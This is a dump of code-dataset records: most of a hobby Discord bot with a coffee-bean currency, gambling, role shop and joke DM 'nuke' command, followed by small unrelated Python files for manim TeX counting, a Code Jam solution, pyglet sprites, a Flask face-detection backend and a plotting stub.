{ctx.channel.name}')\n@beans.error\nasync def beans_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: beans | ERROR: {error}')\n\n\n\n@bot.command(name='net')\nasync def net(ctx):\n '''\n Check how many beans you have.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n net_gamble = coffee_cog.get_net_gamble(users, user)\n await ctx.message.delete()\n\n color = discord.Color.green() if net_gamble > 0 else discord.Color.red()\n\n embed = discord.Embed(color=color)\n embed.description = f'{user.mention}, you have gained {net_gamble} coffee beans through gambling.'\n\n await ctx.send(embed=embed)\n logger.info(f'{user} requested to see their net_gamble in {ctx.channel.name}')\n@net.error\nasync def net_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: net | ERROR: {error}')\n\n\n\n@bot.command(name='giftbeans', aliases=['gb'])\nasync def giftbeans(ctx, amount: int, target):\n '''\n Send someone some beans :)\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n if coffee_cog.get_beans(users, user) >= amount > 0:\n recipient = ctx.message.mentions[0]\n await coffee_cog.update_data(users, recipient)\n await coffee_cog.transfer_beans(users, user, recipient, amount)\n await ctx.send(f'{user.mention} has gifted {recipient.mention} {amount} coffee beans.')\n logger.info(f'{user} gifted {recipient} {amount} coffee beans.')\n else:\n await ctx.send('Unfortunately, you cannot gift that number of beans.')\n\n save_users(user_data, users)\nasync def giftbeans_error(ctx, error):\n if isinstance(error, commands.BadArgument):\n await ctx.send('You did the command wrong.')\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: giftbeans | ERROR: {error}')\n\n\n\n@bot.command(name='gamble', aliases=['g'])\nasync def gamble(ctx, amount: int, color):\n '''\n Gamble some beans; bet on a color. You must gamble over 50 beans.\n --gamble \n Colors are red, black, or green. 
\n Red/black has 45% chance, green has 10% but gives 7 times your bet amount.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n allowed_channels = ['lotto', 'the-room-where-it-happens']\n if not ctx.channel.name in allowed_channels:\n await ctx.send('You cannot gamble here.')\n return\n \n colors = ['red', 'black', 'green']\n rolename = 'Unlucky'\n\n if coffee_cog.get_beans(users, user) >= amount >= 50:\n if color in colors:\n await coffee_cog.update_data(users, user)\n await coffee_cog.add_beans(users, user, -1*amount)\n await coffee_cog.update_net_gamble(users, user, -1*amount)\n\n roll = random.randint(1, 101)\n if roll < 46:\n result = 'red'\n elif roll < 91:\n result = 'black'\n else:\n result = 'green'\n\n if color == result and result == 'green':\n await coffee_cog.add_beans(users, user, 8*amount)\n await coffee_cog.update_net_gamble(users, user, 8*amount)\n msg = 'You won the jackpot!'\n elif color == result:\n await coffee_cog.add_beans(users, user, 2*amount)\n await coffee_cog.update_net_gamble(users, user, 2*amount)\n msg = 'You won!'\n else:\n msg = f'It landed on {result}. You lost...'\n # get the unlucky role if you gamble over 10k and lose\n if amount >= 10000 and not rolename in [roles.name for roles in user.roles]: \n role = get(user.guild.roles, name=rolename)\n await user.add_roles(role)\n\n beans = coffee_cog.get_beans(users, user)\n await ctx.send(f'{msg} You now have {beans} coffee beans.')\n else:\n await ctx.send('Invalid color.')\n else:\n await ctx.send('Unfortunately, you cannot gamble that number of beans.')\n\n save_users(user_data, users)\n@gamble.error\nasync def gamble_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: gamble | ERROR: {error}')\n\n\n\n@bot.command(name='dailybeans', aliases=['daily'])\nasync def dailybeans(ctx):\n '''\n Collect your daily 200 coffee beans.\n Available every 22 hours.\n '''\n daily_amount = 200\n\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n \n next_avail = coffee_cog.next_daily_available_in(users, user) \n if next_avail <= 0:\n await coffee_cog.add_beans(users, user, daily_amount)\n await coffee_cog.reset_time(users, user, 'last_daily')\n\n beans = coffee_cog.get_beans(users, user)\n await ctx.send(f'Congratulations! 
You now have {beans} coffee beans.')\n logger.info(f'{user} got their daily coffee beans.')\n else:\n await ctx.send(f'You can get your daily beans in {round(next_avail, 1)} hours.')\n\n save_users(user_data, users)\n\n\n\n@bot.command(name='tip')\nasync def tip(ctx, amount: int):\n '''\n Tip Robo Waiter some coffee beans.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n if coffee_cog.get_beans(users, user) >= amount > 0:\n await coffee_cog.add_beans(users, user, -1*amount)\n\n thanks = ['Much appreciated.', 'Much obliged.']\n await ctx.send(random.choice(thanks))\n logger.info(f'{user} tipped {amount} coffee beans.')\n else:\n await ctx.send('Unfortunately, you cannot tip that number of beans.')\n\n save_users(user_data, users)\nasync def giftbeans_error(ctx, error):\n if isinstance(error, commands.BadArgument):\n await ctx.send('You did the command wrong.')\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: tip | ERROR: {error}')\n\n\n\n\n@bot.command(name='leaderboard', aliases=['lb'])\nasync def leaderboard(ctx):\n '''\n See the coffee bean top leaderboard.\n '''\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n await ctx.message.delete()\n \n lb = coffee_cog.get_lb(users)\n \n embed = discord.Embed(color=discord.Color.orange())\n embed.title = ':coffee: *Coffee Bean Leaderboards* :coffee:'\n desc = ''\n for i, (name, beans) in enumerate(lb):\n if i < 12 and i != 0: # really shitty code here but whatever\n desc += f'{i}. **{name}** - *{beans} beans*\\n'\n #embed.add_field(name=f'{i+1}. {name} - {beans} beans', value=f' ', inline=False)\n embed.description = desc\n await ctx.send(embed=embed)\n logger.info(f'{ctx.message.author} requested to see the leaderboard in {ctx.channel.name}')\n\n@bot.command(name='lossboard', aliases=['Lb'])\nasync def lossboard(ctx):\n '''\n See who has lost the most gambling.\n '''\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n await ctx.message.delete()\n \n lb = coffee_cog.get_lossboard(users)\n \n embed = discord.Embed(color=discord.Color.red())\n embed.title = ':coffee: *Coffee Bean Lossboards* :coffee:'\n desc = ''\n for i, (name, net_loss) in enumerate(lb):\n if i < 10:\n desc += f'{i+1}. **{name}**: *{net_loss} beans*\\n'\n #embed.add_field(name=f'{i+1}. 
{name} - {beans} beans', value=f' ', inline=False)\n embed.description = desc\n await ctx.send(embed=embed)\n logger.info(f'{ctx.message.author} requested to see the lossboard in {ctx.channel.name}')\n\n\n\n\n@bot.command(name='shop')\nasync def shop(ctx):\n '''\n The coffee shop.\n '''\n await ctx.message.delete()\n\n embed = discord.Embed(color=discord.Color.teal())\n embed.title = ':coffee: *Coffee Shop* :coffee:'\n embed.set_thumbnail(url=ctx.guild.icon_url)\n\n items = [\n ('Change nickname', '--changenick |\\n 50 coffee beans'),\n ('Nuke someone', '--nuke |\\n 300 coffee beans'),\n ('Become a regular!', '--regular |\\n 1000 coffee beans'),\n ('Become a caffeine addict!', '--caffeineaddict |\\n 7500 coffee beans'),\n ('Order your own drink!', '--order |\\n 25,000 coffee beans'),\n ('Become a pumpkin spice latte!', '--pumpkinspice |\\n 40,000 coffee beans')\n ]\n\n for name, value in items:\n embed.add_field(name=name, value=value, inline=True)\n\n await ctx.send(embed=embed)\n logger.info(f'{ctx.message.author} requested to see the shop in {ctx.channel.name}')\n\n\n\n@bot.command(name='changenick', aliases=['cn'])\nasync def changenick(ctx, nickname):\n '''\n Change your nickname for 50 beans.\n --changenick \n '''\n cost = 50\n user = ctx.message.author\n\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n \n if str(user.id) not in users:\n logger.warning(f'{user} is NOT in JSON file but is trying to change nickname.')\n \n if coffee_cog.get_beans(users, user) >= cost:\n await user.edit(nick=nickname)\n await coffee_cog.add_beans(users, user, -1*cost)\n await ctx.send(f'Success {user.mention}!')\n else:\n ctx.send(f'You do not have enough beans; you need {count}.')\n\n save_users(user_data, users)\n@changenick.error\nasync def changenick_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: changenick | ERROR: {error}')\n\n\n\nasync def buy_role(ctx, cost, rolename):\n '''\n Helper function for roles.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n \n if str(user.id) not in users:\n logger.warning(f'{user} is NOT in JSON file but is trying to buy the Regular role.')\n\n if coffee_cog.get_beans(users, user) >= cost:\n if not rolename in [roles.name for roles in user.roles]:\n role = get(user.guild.roles, name=rolename)\n await user.add_roles(role)\n\n await coffee_cog.add_beans(users, user, -1*cost)\n beans = coffee_cog.get_beans(users, user)\n await ctx.send(f'Congrats! You are now a {rolename}. 
You now have {beans} coffee beans.')\n logger.info(f'{user} bought the {rolename} role.')\n else:\n await ctx.send(f'You already are a {rolename}.')\n else:\n await ctx.send(f'You do not have enough beans; you need {cost}.')\n\n save_users(user_data, users)\n\n@bot.command(name='regular')\nasync def regular(ctx):\n '''\n Obtain the 'Regular' role in exchange for 1000 beans.\n '''\n cost = 1000\n rolename = 'Regular'\n\n await buy_role(ctx, cost, rolename)\n@regular.error\nasync def regular_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: regular | ERROR: {error}')\n\n@bot.command(name='caffeineaddict')\nasync def caffeineaddict(ctx):\n '''\n Obtain the 'Caffeine Addict' role in exchange for 7500 beans.\n '''\n cost = 7500\n rolename = 'Caffeine Addict'\n\n await buy_role(ctx, cost, rolename)\n@caffeineaddict.error\nasync def caffeineaddict_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: caffeineaddict | ERROR: {error}')\n\n@bot.command(name='pumpkinspice')\nasync def pumpkinspice(ctx):\n '''\n Obtain the 'Pumpkin Spice Latte' role in exchange for 40,000 beans.\n '''\n cost = 40000\n rolename = 'Pumpkin Spice Latte'\n\n await buy_role(ctx, cost, rolename)\n@pumpkinspice.error\nasync def pumpkinspice_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: pumpkinspice | ERROR: {error}')\n\n@bot.command(name='order')\nasync def order(ctx, drink_name: str, color:str):\n '''\n Buy a drink of your choice (obtain the role) for 25,000 beans.\n --order \"drink name\" \n '''\n guild = ctx.guild\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n cost = 25000\n position = 11\n beans = coffee_cog.get_beans(users, user)\n unorderable = ['Pumpkin Spice Latte', 'Brewmaster']\n\n if '#' in color:\n color = color.replace('#', '')\n col = discord.Color(value=int(color, 16))\n\n if str(user.id) not in users:\n logger.warning(f'{user} is NOT in JSON file but is trying to buy a role.')\n\n if drink_name in unorderable:\n await ctx.send('You cannot order this drink.')\n return\n \n if drink_name.lower() in [roles.name.lower() for roles in user.roles]:\n await ctx.send(f'You are already a {drink_name}.')\n return\n\n if beans >= cost:\n await coffee_cog.add_beans(users, user, -1*cost)\n # check if role already exists, if not then create it\n if get(user.guild.roles, name=drink_name) is None:\n try:\n await guild.create_role(name=drink_name, hoist=True, color=col)\n except Exception as e:\n print(e)\n\n role = get(user.guild.roles, name=drink_name)\n await role.edit(position=position)\n await user.add_roles(role)\n await ctx.send(f'Congrats! 
You are now a {drink_name}.')\n logger.info(f'{user} bought the {drink_name} role.')\n\n else:\n await ctx.send(f'You do not have enough beans; you need {cost}.')\n\n save_users(user_data, users)\n@order.error\nasync def order_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: order | ERROR: {error}')\n \n\n\n@bot.command(name='migrate')\n@commands.has_any_role('Brewmaster')\nasync def migrate(ctx):\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n logger.info(f'{ctx.message.author} MIGRATED.')\n await ctx.send('Migrating...')\n\n for member in ctx.guild.members:\n if not member == bot.user:\n await coffee_cog.update_data(users, member)\n await coffee_cog.migrate_user(users, member)\n \n save_users(user_data, users)\n await ctx.send('Done!')\n\n\n\n@tasks.loop(seconds=30.0)\nasync def loop_beans():\n '''\n Every 30 seconds gives everyone in vc 1 bean.\n '''\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n for guild in bot.guilds:\n if guild.name == GUILD:\n server = guild\n break\n members = server.members\n for member in members:\n if member.voice and member != bot.user:\n await coffee_cog.update_data(users, member)\n await coffee_cog.add_beans(users, member, 1)\n\n roll = random.randint(1, 10001)\n if roll == 69:\n await member.send('You found a golden coffee bean!')\n await coffee_cog.add_beans(users, member, 10000)\n\n save_users(user_data, users)\n\n\n\n@bot.command(name='clear')\n@commands.has_any_role('Brewmaster', 'Pumpkin Spice Latte')\nasync def clear(ctx, amount=10):\n await ctx.channel.purge(limit=amount)\n logger.info(f'{ctx.message.author} cleared {ctx.channel.name}.')\n\n\n\n@bot.command(name='nuke')\n@commands.has_any_role('Brewmaster', 'Regular', 'Caffeine Addict')\nasync def nuke(ctx, nuke_count: int, *targets):\n '''\n Sends specified number of nuke dms to target(s) for 300 credits.\n Must be 'Brewmaster' or 'Regular' to use this command.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n cost = 300\n NUKE_LIMIT = 30\n allowed_channels = ['robo-waiter', 'the-room-where-it-happens']\n\n if nuke_count < 0:\n return\n\n if coffee_cog.get_beans(users, user) < cost:\n await ctx.send('You are too poor to nuke.')\n return\n \n await coffee_cog.update_data(users, user)\n await coffee_cog.add_beans(users, user, -1*cost)\n\n if ctx.channel.name in allowed_channels:\n nuke_amount = NUKE_LIMIT if nuke_count > NUKE_LIMIT else nuke_count\n if ctx.message.mentions:\n await ctx.send(':rotating_light: NUKE INITIATED :rotating_light:')\n for target_member in ctx.message.mentions:\n for i in range(nuke_amount):\n await target_member.send(f':bomb: YOU HAVE BEEN NUKED BY {user}!!! 
:bomb:')\n logger.info(f'{user} nuked {target_member} {nuke_amount} times from channel: {ctx.channel.name}.')\n else:\n await ctx.send('No targets specified.')\n logger.info(f'{user} tried to nuke with no targets in: {ctx.channel.name} and failed.')\n else:\n await ctx.send('You do not have access to the launch system.')\n logger.info(f'{user} tried to nuke in an invalid channel: {ctx.channel.name} and failed.')\n save_users(user_data, users)\n@nuke.error\nasync def nuke_error(ctx, error):\n if isinstance(error, commands.BadArgument):\n await ctx.send('Invalid launch code.')\n if isinstance(error, commands.CommandInvokeError):\n await ctx.send('ERROR: Sorry, your nukes do not reach that far.')\n if isinstance(error, commands.MissingAnyRole):\n await ctx.send('I\\'m afraid you do not have access to nukes. Sincere apologies.')\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: nuke | ERROR: {error}')\n\n\n\"\"\"\n@bot.command(name='hbd')\nasync def hbd(ctx, nuke_count: int, *targets):\n '''\n Sends specified number of nuke dms to target(s) for 300 credits.\n Must be 'Brewmaster' or 'Regular' to use this command.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n cost = 0\n NUKE_LIMIT = 100\n allowed_channels = ['robo-waiter', 'the-room-where-it-happens']\n\n if nuke_count < 0:\n return\n\n if coffee_cog.get_beans(users, user) < cost:\n await ctx.send('You are too poor to nuke.')\n return\n \n await coffee_cog.update_data(users, user)\n await coffee_cog.add_beans(users, user, -1*cost)\n\n if ctx.channel.name in allowed_channels:\n nuke_amount = NUKE_LIMIT if nuke_count > NUKE_LIMIT else nuke_count\n if ctx.message.mentions:\n await ctx.send(':rotating_light: BIRTHDAY NUKE INITIATED :rotating_light:')\n for target_member in ctx.message.mentions:\n for i in range(nuke_amount):\n await target_member.send(f':birthday: YOU HAVE :candle: BEEN :stars: WISHED :sparkles: A VERY HAPPY BIRTHDAY :sparkler: BY :sparkling_heart: {user} :birthday:')\n await target_member.send(f':birthday: AGAIN, YOU :stars: HAVE :candle: BEEN :sparkles: WISHED A VERY :sparkler: HAPPY :sparkling_heart: BIRTHDAY BY {user} :birthday:')\n logger.info(f'{user} nuked {target_member} {nuke_amount} times from channel: {ctx.channel.name}.')\n else:\n await ctx.send('No targets specified.')\n logger.info(f'{user} tried to nuke with no targets in: {ctx.channel.name} and failed.')\n else:\n await ctx.send('You do not have access to the launch system.')\n logger.info(f'{user} tried to nuke in an invalid channel: {ctx.channel.name} and failed.')\n save_users(user_data, users)\n@hbd.error\nasync def hbd_error(ctx, error):\n if isinstance(error, commands.BadArgument):\n await ctx.send('Invalid launch code.')\n if isinstance(error, commands.CommandInvokeError):\n await ctx.send('ERROR: Sorry, your nukes do not reach that far.')\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: hbd | ERROR: {error}')\n\"\"\"\n\n\n\n\n\n\n\n####################################################################\n#=======================NON COFFEE STUFF HERE=======================\n####################################################################\n\n@bot.command(name='dopamine')\nasync def dopamine(ctx):\n '''\n Get a hit of dopamine, with help from Robo.\n '''\n await asyncio.sleep(random.randint(5, 10))\n await ctx.send(f'{ctx.message.author.mention} <3')\n\n\n@bot.command(name='8ball')\nasync def eball(ctx):\n '''\n Get a yes or no from Robo Waiter.\n '''\n responses = ['Most 
certainly.', 'Most definitely not.']\n await ctx.message.delete()\n await ctx.send(random.choice(responses))\n@eball.error\nasync def eball_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: rng | ERROR: {error}')\n\n@bot.command(name='rng')\nasync def rng(ctx, start: int, end: int):\n '''\n Generates a random integer in interval [start, end].\n '''\n embed = discord.Embed()\n embed.title = 'Your Random Number'\n embed.description = random.randint(start, end)\n await ctx.send(embed=embed)\n@rng.error\nasync def rng_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: rng | ERROR: {error}')\n\n@bot.command(name='bday')\n@commands.has_any_role('Brewmaster')\nasync def bday(ctx):\n '''\n Plays the happy birthday song.\n '''\n video = 'happy birthday'\n music_cog = bot.get_cog('MusicCog')\n await music_cog.join(ctx)\n await music_cog.play(ctx, query=video)\n\n\n@bot.command(name='quote')\nasync def quote(ctx, quote_type):\n '''\n Outputs a random quote of specified type.\n Great for when you're bored or feeling experimental.\n Options include: 'funny', 'motivational'\n '''\n quote_types = ['funny', 'motivational']\n if quote_type in quote_types:\n with open(f'quotes/{quote_type}_quotes.txt', 'r', encoding='utf8') as f:\n quotes = f.readlines()\n random_int = random.randint(0,len(quotes)-1)\n\n if quote_type == 'funny':\n if random_int % 2 == 1:\n random_int -= 1\n q = f'{quotes[random_int]}{quotes[random_int+1]}'\n elif quote_type == 'motivational':\n q = f'{quotes[random_int]}'\n\n await ctx.send(q)\n logger.info(f'{ctx.message.author} requested a {quote_type} quote in {ctx.channel.name}.')\n else:\n await ctx.send(f'My apologies. I couldn\\'t find a \"{quote_type}\" quote.')\n@quote.error\nasync def quote_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: quote | ERROR: {error}')\n\n\n\n@bot.command(name='setmood', aliases=['mood'])\nasync def setmood(ctx, mood):\n '''\n Outputs a scenic setting exposition followed by joining vc and playing matching soundscape.\n Perfect for sleeping or studying.\n Join a voice channel for the full effect.\n Options include: 'fall', 'nature', 'rain', 'summer', 'jazz', 'synthwave'\n '''\n moods = ['fall', 'nature', 'rain', 'summer', 'jazz', 'synthwave']\n member = ctx.message.author\n \n if mood in moods:\n with open(f'mood/{mood}/moods.txt','r', encoding='utf8') as f:\n scenes = f.readlines()\n random_int = random.randint(0,len(scenes)-1)\n \n embed = discord.Embed()\n embed.description = f'*{scenes[random_int][:-1]}*'\n\n await ctx.send(embed=embed)\n logger.info(f'{ctx.message.author} set mood to: {mood} in {ctx.channel.name}.')\n\n if member and member.voice:\n with open(f'mood/{mood}/urls.txt','r', encoding='utf8') as f:\n urls = f.readlines()\n video = urls[random_int].rstrip()\n music_cog = bot.get_cog('MusicCog')\n await music_cog.join(ctx)\n logger.info(f'Robo Waiter joined or is in: {member.voice.channel}.')\n await music_cog.play(ctx, query=video)\n logger.info(f'{ctx.message.author} added {video} to the queue.')\n else:\n await ctx.send('Join a voice channel for the full effect.')\n else:\n await ctx.send(f'Mood \"{mood}\" not found.')\n@setmood.error\nasync def setmood_error(ctx, error):\n if isinstance(error, commands.BadArgument):\n await ctx.send('I could not find that mood.')\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: setmood | ERROR: {error}')\n\n\n\n@bot.command(name='ustoopid')\nasync def ustoopid(ctx):\n '''\n A cleaner way to point out another's 
intelligence or lack thereof.\n '''\n await ctx.message.delete()\n await ctx.send('Not quite the sharpest tool in the shed I see.')\n\n@bot.command(name='yep')\nasync def yep(ctx):\n '''\n When you need Robo Waiter to confirm.\n '''\n choices = ['Indubitably.', 'Certainly.', 'Indeed.', 'Undoubtedly.', 'Assuredly.']\n await ctx.message.delete()\n await ctx.send(random.choice(choices))\n\n@bot.command(name='helpme')\nasync def helpme(ctx):\n '''\n Sends a helpful link when someone calls for help.\n '''\n embed = discord.Embed(color=discord.Color.green())\n embed.title = 'Somebody call for help?'\n embed.description = '[Try this helpful link.](https://www.youtube.com/watch?v=dQw4w9WgXcQ)'\n await ctx.send(embed=embed)\n@helpme.error\nasync def helpme_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: helpme | ERROR: {error}')\n\n\n\n@bot.command(name='sendmelody', aliases=['sm'])\nasync def sendmelody(ctx, target):\n '''\n Send a nice melody somebody's way if they're in a voice channel.\n '''\n if target and len(ctx.message.mentions) == 1:\n member = ctx.message.mentions[0]\n if member.voice:\n music_cog = bot.get_cog('MusicCog')\n await music_cog.join_member(ctx, member)\n logger.info(f'Robo Waiter joined or is in: {member.voice.channel}.')\n await music_cog.play(ctx, query='Replay [Official Music Video] - Iyaz')\n logger.info(f'{ctx.message.author} queued SHAWTYS LIKE A MELODY for {member}.')\n else :\n await ctx.send('Unfortunately, your target is not in a voice channel.')\n@sendmelody.error\nasync def sendmelody_error(ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You must specify a target.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('I\\'m sorry, but your target is invalid.')\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: sendmelody | ERROR: {error}')\n\n\nif __name__ == '__main__':\n bot.run(TOKEN)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":29369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"123472685","text":"from __future__ import annotations\n\nimport re\nfrom functools import lru_cache\n\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from typing import List, Tuple\n\n\n@lru_cache(maxsize=1)\ndef get_pattern_symbol_count_pairs() -> List[Tuple[str, int]]:\n from manimlib.utils.tex_to_symbol_count import TEX_TO_SYMBOL_COUNT\n\n # Gather all keys of previous map, grouped by common value\n count_to_tex_list = dict()\n for command, num in TEX_TO_SYMBOL_COUNT.items():\n if num not in count_to_tex_list:\n count_to_tex_list[num] = []\n count_to_tex_list[num].append(command)\n\n # Create a list associating each count with a regular expression\n # that will find any tex commands matching that list\n pattern_symbol_count_pairs = list()\n\n # Account for patterns like \\begin{align} and \\phantom{thing}\n # which, together with the bracketed content account for zero paths.\n # Deliberately put this first in the list\n tex_list = [\"begin\", \"end\", \"phantom\"]\n pattern_symbol_count_pairs.append(\n (\"|\".join(r\"\\\\\" + s + r\"\\{[^\\\\}]+\\}\" for s in tex_list), 0)\n )\n\n for count, tex_list in count_to_tex_list.items():\n pattern = \"|\".join(r\"\\\\\" + s + r\"(\\s|\\\\)\" + s for s in tex_list)\n pattern_symbol_count_pairs.append((pattern, count))\n\n # Assume all other expressions of the form \\thing are drawn with one path\n # Deliberately put this last in the list\n 
pattern_symbol_count_pairs.append((r\"\\\\[a-zA-Z]+\", 1))\n\n return pattern_symbol_count_pairs\n\n\ndef num_tex_symbols(tex: str) -> int:\n \"\"\"\n This function attempts to estimate the number of symbols that\n a given string of tex would produce.\n \"\"\"\n total = 0\n for pattern, count in get_pattern_symbol_count_pairs():\n total += count * len(re.findall(pattern, tex))\n tex = re.sub(pattern, \" \", tex) # Remove that pattern\n\n # Count remaining characters\n total += sum(map(lambda c: c not in \"^{} \\n\\t_$\", tex))\n return total\n","sub_path":"manimlib/utils/tex.py","file_name":"tex.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"561383721","text":"import pyglet\nimport config\n\nIMAGES = {\"ground\" : pyglet.image.load(config.ART_FOLDER + \"ground.png\"),\n \"tail\" : pyglet.image.load(config.ART_FOLDER + \"tail.png\"),\n \"head\" : pyglet.image.load(config.ART_FOLDER + \"head.png\"),\n \"fire\" : pyglet.image.load(config.ART_FOLDER + \"fire.png\"),\n \"player\" : pyglet.image.load(config.ART_FOLDER + \"player.png\")}\nTILES = {\"fire\" : pyglet.image.ImageGrid(IMAGES[\"fire\"], 1, 4)}\nFRAMES = {\"fire\" : (pyglet.image.AnimationFrame(TILES[\"fire\"][0], 0.10),\n pyglet.image.AnimationFrame(TILES[\"fire\"][1], 0.10),\n pyglet.image.AnimationFrame(TILES[\"fire\"][2], 0.10),\n pyglet.image.AnimationFrame(TILES[\"fire\"][3], 0.10))}\nANIMATIONS = {\"fire\" : pyglet.image.Animation(FRAMES[\"fire\"])}\n\nclass Ground(pyglet.sprite.Sprite):\n def __init__(self, map_x, map_y):\n self.map_x = map_x\n self.map_y = map_y\n super(Ground, self).__init__(IMAGES[\"ground\"], 0, 0)\n\nclass Tail(pyglet.sprite.Sprite):\n def __init__(self, map_x, map_y):\n self.map_x = map_x\n self.map_y = map_y\n super(Tail, self).__init__(IMAGES[\"tail\"], 0, 0)\n\nclass Head(pyglet.sprite.Sprite):\n def __init__(self, map_x, map_y):\n self.map_x = map_x\n self.map_y = map_y\n super(Head, self).__init__(IMAGES[\"head\"], 0, 0)\n\nclass Fire(pyglet.sprite.Sprite):\n def __init__(self, map_x, map_y):\n self.map_x = map_x\n self.map_y = map_y\n super(Fire, self).__init__(ANIMATIONS[\"fire\"], 0, 0)\n\nclass Player(pyglet.sprite.Sprite):\n def __init__(self, map_x, map_y):\n self.map_x = map_x\n self.map_y = map_y\n super(Player, self).__init__(IMAGES[\"player\"], 0, 0)\n","sub_path":"tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389633010","text":"import numpy as np\nimport cv2\nimport pkg_resources\nimport socket\nfrom flask import Flask, request, redirect\nfrom flask_cors import CORS\n\nhaar_xml = pkg_resources.resource_filename(\n 'cv2', 'data/haarcascade_frontalface_default.xml')\nface_cascade = cv2.CascadeClassifier(haar_xml)\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n if 'file' not in request.files:\n return redirect(request.url)\n file = request.files['file']\n img = np.asarray(bytearray(request.files['file'].read()), dtype=\"uint8\")\n img = cv2.imdecode(img, cv2.IMREAD_COLOR)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n backendaddr = socket.gethostbyname(socket.gethostname())\n\n return {\"faces\":[x.tolist() for x in faces],\n \"backendaddr\":backendaddr}\n\n return '''\n \n Backend\n
Backend, send POST with file
\n '''\n\nif __name__ == \"__main__\":\n app.secret_key = 'super secret key'\n app.config['SESSION_TYPE'] = 'filesystem'\n app.run(port=5001,host='0.0.0.0')\n","sub_path":"application/facedetect/src/backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"633673541","text":"# -*- coding: utf-8 -*-\n\n\ndef main():\n t = int(input())\n for case in range(1, t + 1):\n k, c, s = [int(x) for x in input().split()]\n if c * s < k:\n print('Case #{}: {}'.format(case, 'IMPOSSIBLE'))\n continue\n n = 0\n ret = ['Case #{}:'.format(case)]\n for i in range(k):\n n = n * k + i\n if (i + 1 == k) or (i % c == c - 1):\n ret.append(str(n + 1))\n n = 0\n print(' '.join(ret))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"qualification_round_2016/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"154403023","text":"import numpy as np\nimport struct\nimport time\nfrom math import *\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport ipdb\n\ndef plot_data(_fpga, _channels):\n global data, fpga, channels, bw\n fpga = _fpga; channels = _channels\n bw = 67 #trunc(fpga.est_brd_clk()/2.)\n fig = plt.figure()\n ax1 = fig.add_subplot(211)\n ax2 = fig.add_subplot(223)\n ax3 = fig.add_subplot(224)\n \"\"\"ax1.set_title('Relative angle [rad]')\n ax1.set_xlabel('frequency?')\n ax1.set_ylabel('$\\phi$[rad]')\n ax2.set_title('Power ZDOK0 [dB]')\n ax2.set_xlabel('frequency')\n ax2.set_ylabel('[dB]')\n ax3.set_title('Power ZDOK1 [dB]')\n ax3.set_xlabel('frequency')\n ax3.set_ylabel('[dB]')\n ax1.set_xlim(0,bw)\n ax1.set_ylim(-10, 10)\n ax2.set_xlim(0,bw)\n ax2.set_ylim(-10, 10)\n ax3.set_xlim(0,bw)\n ax3.set_ylim(-10, 10)\n ax1.grid()\n ax2.grid()\n ax3.grid()\"\"\"\n angle, = ax1.plot([], [], lw=2)\n powA, = ax2.plot([], [], lw=2)\n powB, = ax3.plot([], [], lw=2)\n data = [angle, powA, powB]\n #ipdb.set_trace()\n 